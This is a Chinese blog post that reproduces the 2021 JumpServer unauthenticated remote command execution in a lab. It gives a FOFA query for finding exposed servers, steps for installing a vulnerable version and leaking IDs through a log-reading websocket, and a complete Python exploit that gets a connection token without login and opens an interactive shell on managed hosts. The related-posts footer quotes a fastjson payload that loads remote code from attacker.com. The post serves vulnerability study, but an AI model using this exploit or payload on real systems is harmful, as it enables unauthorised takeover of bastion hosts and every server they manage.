JumpServer RCE复现

已于 2023-02-13 14:20:44 修改
阅读量1.1k 收藏 4
点赞数
分类专栏: Cyber-Security 文章标签: 运维 网络安全 安全 Powered by 金山文档
于 2023-02-13 14:17:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53009585/article/details/129001750
版权

前言

JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统。JumpServer 使用Python / Django 进行开发。

2021年1月15日,JumpServer发布更新,修复了一处远程命令执行漏洞。由于 JumpServer 某些接口未做授权限制,攻击者可构造恶意请求获取到日志文件获取敏感信息,或者执行相关API操作控制其中所有机器,执行任意命令。

堡垒机(跳板机)的概念

堡垒机,即在一个特定的网络环境下,为了保障网络和数据不受来自外部和内部用户的入侵和破坏,而运用各种技术手段实时收集和监控网络环境中每一个组成部分的系统状态、安全事件、网络活动,以便集中报警、及时处理及审计定责。
直白的来讲就是统一管理资产权限

影响范围

JumpServer < v2.6.2

JumpServer < v2.5.4

JumpServer < v2.4.5

JumpServer = v1.5.9

fofa语法 app=“FIT2CLOUD-JumpServer-堡垒机”

准备

推荐使用centos7.x(尽量高的配置:4核8G 100G磁盘空间)搭建JumpServer (v2.6.1 新版本已经修复)。

CentOS7系统磁盘扩容

centos7 在原有磁盘空间基础上拓展大小需要清空之前的快照,从客户机操作系统内部对磁盘重新进行分区和拓展文件系统。

系统挂载磁盘

#原本的磁盘,并未扩容
[root@10 ~]# df -h
文件系统        容量  已用  可用 已用% 挂载点
/dev/sda3        10G  6.2G  3.9G   62% /
devtmpfs        3.8G     0  3.8G    0% /dev
tmpfs           3.9G     0  3.9G    0% /dev/shm
tmpfs           3.9G  9.0M  3.9G    1% /run
tmpfs           3.9G     0  3.9G    0% /sys/fs/cgroup
/dev/sda1       197M  152M   46M   78% /boot
tmpfs           781M   20K  781M    1% /run/user/0

查看新硬盘分区

fdisk -l /dev/sda #查看磁盘情况
df -lh            #查看磁盘占用情况
fdisk /dev/sda    #创建新分区        命令行输入 n 创建新分区 d 删除分区 p 显示当前分区 w 配置写入磁盘
xfs_growfs /dev/sda3    #刷新

centos7根目录扩容(根目录在sda3 vgdisplay为空)

扩容之后

搭建

wget https://github.com/jumpserver/jumpserver/releases/download/v2.6.1/quick_start.sh

编辑安装脚本

vi quick_start.sh

将这两个变量的值修改,不改的话默认最先版本,最新版没有漏洞

Version="v2.6.1"
JMS_Version="v2.6.1"
chmod +x ./quick_start.sh
./quick_start.sh

默认会安装到/opt下

cd /opt/jumpserver-installer-v2.6.1
./jmsctl.sh start

安装完成后

先访问8080,默认账号密码问admin/admin,进入之后修改默认密码

复现前配置一下堡垒机:

在资源管理中添加一台主机(靶机),实现连接(可以参考官方文档)

访问http://10.10.10.142:8080/luna/?_=1676259416273

Google插件:https://chrome.google.com/webstore/detail/websocket-test-client/fgponpodhbmadfljofbimhhlengambbn/related

复现过程

打开插件

连接ws://youtip:8080/ws/ops/tasks/log进行测试
发送{"task":"/opt/jumpserver/logs/jumpserver"}查看日志

获取system_user user_id asset_id 

asset_id=e911a0f0-069c-4ac1-a3ff-6459a4ec9d33
system_user_id=504dd258-3279-4615-bd4d-614a03231bee
user_id=aea7a80d-e1a5-44d8-8456-39f4cacd5856
import os
import asyncio
import aioconsole
import websockets
import requests
import json
 
url = "/api/v1/authentication/connection-token/?user-only=1"
 
 
def get_celery_task_log_path(task_id):
    task_id = str(task_id)
    rel_path = os.path.join(task_id[0], task_id[1], task_id + ".log")
    path = os.path.join("/opt/jumpserver/", rel_path)
    return path
 
 
async def send_msg(websocket, _text):
    if _text == "exit":
        print(f'you have enter "exit", goodbye')
        await websocket.close(reason="user exit")
        return False
    await websocket.send(_text)
 
 
async def send_loop(ws, session_id):
    while True:
        cmdline = await aioconsole.ainput()
        await send_msg(
            ws,
            json.dumps(
                {"id": session_id, "type": "TERMINAL_DATA", "data": cmdline + "\n"}
            ),
        )
 
 
async def recv_loop(ws):
    while True:
        recv_text = await ws.recv()
        ret = json.loads(recv_text)
        if ret.get("type", "TERMINAL_DATA"):
            await aioconsole.aprint(ret["data"], end="")
 
 
# 客户端主逻辑
async def main_logic():
    print("#######start ws")
    async with websockets.connect(target) as client:
        recv_text = await client.recv()
        print(f"{recv_text}")
        session_id = json.loads(recv_text)["id"]
        print("get ws id:" + session_id)
        print("###############")
        print("init ws")
        print("###############")
        inittext = json.dumps(
            {
                "id": session_id,
                "type": "TERMINAL_INIT",
                "data": '{"cols":164,"rows":17}',
            }
        )
        await send_msg(client, inittext)
        await asyncio.gather(recv_loop(client), send_loop(client, session_id))
 
 
if __name__ == "__main__":
    host = "http://192.168.31.227:8080"
    cmd = "whoami"
    if host[-1] == "/":
        host = host[:-1]
    print(host)
    data = {"user": "aea7a80d-e1a5-44d8-8456-39f4cacd5856", "asset": "e911a0f0-069c-4ac1-a3ff-6459a4ec9d33",
            "system_user": "504dd258-3279-4615-bd4d-614a03231bee"}
    print("##################")
    print("get token url:%s" % (host + url,))
    print("##################")
    res = requests.post(host + url, json=data)
    token = res.json()["token"]
    print("token:%s", (token,))
    print("##################")
    target = (
        "ws://" + host.replace("http://", "") + "/koko/ws/token/?target_id=" + token
    )
    print("target ws:%s" % (target,))
    asyncio.get_event_loop().run_until_complete(main_logic())

运行rce.py

python3 rce.py

今天是 几号
关注
  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CVE-2020-0796微软SMBv3协议RCE1
08-03
声明:请勿用作违法用途,否则后果自负简介SMB( 全 称 是 Server Message Block) 是 一 个 协 议 名 , 它 能 被 用 于 Web
jumpserver_rce
05-27
jumpserver_rce 根据官方报告,这个漏洞的影响版本如下: < v2.6.2 < v2.5.4 < v2.4.5 = v1.5.9 经过测试v1.5.8的Koko无法进行利用,因为它在创建WebSocket连接之后对用户身份进行了鉴权,具体代码看: 判断JumpServer的版本 有个比较简单的办法,就是访问/luna/页面的js进行提取,具体实放在了luna_version.py中 有限的文件读取漏洞 限制主要如下 只能读取以 log 结尾的文件 首先需要使用readlog.py读取日志文件,看其中有没有必要的信息 主要是三个信息 user id asset id system user id 这三个 ID 都是自动生成的 UUID,没法进行遍历 如果jumpserver的日志目录等级是 INFO,拿到的信息就很少了 可以利用这个漏洞去读取一些系统上其它的日志,看看有没有什么
【漏洞JumpServer(CVE-2024-29201、29202) 附带POC
最新发布
qq_43355651的博客
04-02 1760
漏洞
Jumpserver-EXP:JumpServer远程代码执行临时检测利用脚本
03-05
跳转服务器EXP JumpServer远程代码执行临时检测利用脚本 进攻地址: : 用法 脚本在python3环境下编写。 运行脚本: python jumpserver-exp.py [address] 如:python jumpserver-exp.py http://192.168.18.182:8080 运行过程中根据提示输入选择。 功能 阅读日志 运行脚本初期,会先读取目标日志文件,替换路径为/ws/ops/tasks/log/ 。如果日志路径与路径路径不符,且已知实际路径,请自行修改代码。从中检测出可能被利用的目标资产,以<asset>的格式列出。 检测目标可连接性,筛选可用资产 针对上一步列出的目标列表,逐个判活,检测可用性,替换可用目标附带编号列出。 执行命令 (1)脚本询问用户,是否选择进一步攻击?输入yes继续,
CVE-2023-42820:JumpServer密码重置漏洞
2301_80115097的博客
11-10 653
JumpServer开源堡垒机是一款运维安全审计系统产品,提供身份验证、授权控制、账号管 理、安全审计等功能支持,帮助企业快速构建运维安全审计能力。JumpServer开源堡垒机 通过企业版或者软硬件一体机的方式,向企业级用户交付开源增值的运维安全审计解决方 案。漏洞编号:CVE-2023-42820漏洞的核心是随机数种子泄露导致的,未授权的攻击者可以利用该漏洞推算出没有开启多因子验证(MFA)的账号的“重置密码Token”,进而修改该账号的密码。
JumpServer伪随机密码重置漏洞(CVE-2023-42820)以及自动化exp
qq_36585338的博客
11-02 2304
Jumperver是国内开源的堡垒机,在2023年9月份暴露出CVE-2023-42820伪随机数种子泄漏造成任意用户密码重置漏洞,简单来说就是用户点击忘记密码时系统会生成一个随机字符串作为code并发送到用户邮箱,但由于Jumpserver的一个第三方库django-simple-captcha中random函数进行伪随机生成的code可以被预测,导致这个随机字符串code可以根据泄露的种子被推算出来,造成任意用户密码重置漏洞。
漏洞预警:JumpServer未授权访问漏洞(CVE-2023-42442)
yuanlirong22的专栏
09-19 1938
JumpServer堡垒主机API接口/api/v1/terminal/sessions/权限控制被破坏,该API会话重放可以在没有身份验证的情况下下载。利用该漏洞可以访问录像文件,远程获取到敏感信息。
JumpServer2023漏洞合集
fly夏天的博客
11-15 1855
CVE-2023-43651/CVE-2023-42819/CVE-2023-42442/CVE-2023-42820 jumpserver 2023年的新一批漏洞
JumpServer RCE漏洞
fly夏天的博客
12-30 6840
2021年1月的jumpserver RCE漏洞
Jumpserver安全一窥:Sep系列漏洞深度解析
离别歌
10-07 3260
Jumpserver是中国国内公司开发的一个开源项目,在开源堡垒机领域一家独大。在2023年9月官方集中修了一系列安全问题,其中涉及到如下安全漏洞:JumpServer 重置密码验证码可被计算推演的漏洞,CVE编号为CVE-2023-42820JumpServer 重置密码验证码可被暴力破解的漏洞,CVE编号为CVE-2023-43650JumpServer 认证用户跨目录任意文件读取漏洞,CV...
漏洞 | JumpServer未授权访问漏洞
hackzkaq的博客
09-26 558
JumpServer开源堡垒机是一款运维安全审计系统产品,提供身份验证、授权控制、账号管理、安全审计等功能支持,帮助企业快速构建运维安全审计能力。JumpServer开源堡垒机通过企业版或者软硬件一体机的方式,向企业级用户交付开源增值的运维安全审计解决方案。该漏洞存在于JumpServer中,是一个未授权访问漏洞。api/api/v1/terminal/sessions/权限控制存在逻辑错误,可以被攻击者匿名访问。未经身份验证的远程攻击者可利用该漏洞下载ssh日志,并可借此远程窃取敏感信息。
CVE-2019-1003000 Jenkins-PreAuth-RCE 过程1
08-04
前言前几天听小伙伴说 Jenkins 出了个 RCE 我以为是说之前那个需要登录后才能RCE 的漏洞 。但结果小伙伴说这次这个不用登录就能 RCE 是 Oran
CVE-2020-14882​&14883:Weblogic RCE1
08-03
声明:请勿用作违法用途,否则后果自负0x01 简介用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。0x02 漏洞概述编
CVE-2023-42442:JumpServer堡垒机会话回放未授权访问漏洞
薛定谔嘚喵博客
09-25 329
Jumpserver是一款开源的堡垒主机和专业的运维安全审计系统,JumpServer存在未授权访问漏洞(CVE-2023-42442):未经身份验证的远程攻击者利用该漏洞可以访获取敏感信息。JumpServer堡垒机的/api/v1/terminal/sessions/接口由于权限控制不严格,导致可以在未授权的情况下获取到堡垒机的历史会话回放列表,这是官方在公告中声明的身份认证问题。
jumpserver 远程执行漏洞分析和
渗透测试研究中心
04-06 1449
0 简介JumpServer是一款开源的堡垒机,是符合4A规范的运维安全审计系统,通俗来说就是跳板机。2021年1月15日,JumpServer发布安全更新,修了一处远程命令执行漏洞。由于JumpServer某些接口未做授权限制,攻击者可构造恶意请求获取敏感信息,或者执行相关操作控制其中所有机器,执行任意命令。影响版本:JumpServer < v2.6.2JumpServer <...
集权设施攻防兵法:实战攻防之堡垒机篇
ZAWX_NETSTARSEC的博客
06-06 816
2.2021年攻防演练期间,某互联网公司堡垒机遭受攻击,攻击者利用任意用户登录漏洞对齐治堡垒机实施攻击,获得齐治堡垒机的后台管理权限,控制了大量的内网机器。1.能够针对堡垒机的敏感以及异常操作进行实时监测,如漏洞利用、异常时间点认证、异地登录、访问非常用资源等,让管理员在第一时间感知攻击者对堡垒机的漏洞利用、执行的敏感操作。1)攻击者首先通过堡垒机的历史漏洞甚至是堡垒机的0day漏洞对堡垒机实施攻击,比如通过绕过认证直接访问堡垒机的web控制台,获取堡垒机的web管理权限。
开源堡垒机JumpServer远程命令执行漏洞
黑白的博客
05-02 4006
声明 好好学习,天天向上 漏洞描述 JumpServer 是全球首款完全开源的堡垒机, 使用GNU GPL v2.0 开源协议, 是符合4A 的专业运维审计系统。JumpServer 使用Python / Django 进行开发。 2021年1月15日,JumpServer发布更新,修了一处远程命令执行漏洞。由于 JumpServer 某些接口未做授权限制,攻击者可构造恶意请求获取到日志文件获取敏感信息,或者执行相关API操作控制其中所有机器,执行任意命令。 影响范围 JumpServer < v2
fastjson rce
08-09
fastjson是一款流行的Java JSON库,但因其在解析JSON中的不安全行为而存在远程代码执行(RCE)漏洞。为了该漏洞,我们可以按照以下步骤进行操作: 第一步是选择一个适当的fastjson版本,建议使用较早的版本,因为新的版本通常会修漏洞。将fastjson库添加到Java项目的依赖中。 第二步是创建一个恶意JSON字符串,该字符串中包含能够触发RCE漏洞的payload。例如,可以使用如下的JSON字符串: ``` { "@type":"com.sun.rowset.JdbcRowSetImpl", "dataSourceName":"rmi://attacker.com:1099/Exploit", "autoCommit":true } ``` 在这个例子中,我们使用了`com.sun.rowset.JdbcRowSetImpl`类作为目标,其中连接地址指向攻击者控制的RMI服务器,用于向受害系统发送恶意代码。 第三步是编写Java代码,并将上一步创建的JSON字符串作为输入传递给fastjson的解析器。以下是一个简单的示例: ```java import com.alibaba.fastjson.JSON; public class FastjsonRce { public static void main(String[] args) { String maliciousJson = "{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"rmi://attacker.com:1099/Exploit\",\"autoCommit\":true}"; Object parsedObject = JSON.parse(maliciousJson); } } ``` 在这个示例中,我们使用`JSON.parse`方法将JSON字符串解析为一个对象。fastjson在解析时会实例化目标类,并调用其构造函数和setter方法,从而导致RCE漏洞的利用。 第四步是运行上述Java代码,并观察是否成功RCE漏洞。如果目标系统受到fastjson的漏洞影响,恶意代码会在解析过程中被执行,从而使攻击者可以远程控制该系统。 需要注意的是,fastjson RCE漏洞仅用于研究和教育目的,并且应在法律合规和授权的情况下进行。漏洞利用是非法行为,可能导致严重的法律后果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值